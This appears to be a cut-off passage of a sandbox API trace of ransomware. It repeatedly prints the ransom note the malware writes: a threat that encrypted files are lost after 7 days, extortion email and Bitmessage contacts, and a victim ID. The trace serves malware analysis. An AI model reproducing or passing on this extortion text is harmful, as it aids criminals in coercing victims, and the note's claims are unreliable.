\\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.179] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.179] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9f\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0278.179] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.181] CloseHandle (hObject=0x294) returned 1 [0278.181] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\#readme_eman#.rtf")) returned 0xffffffff [0278.181] GetLastError () returned 0x2 [0278.181] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 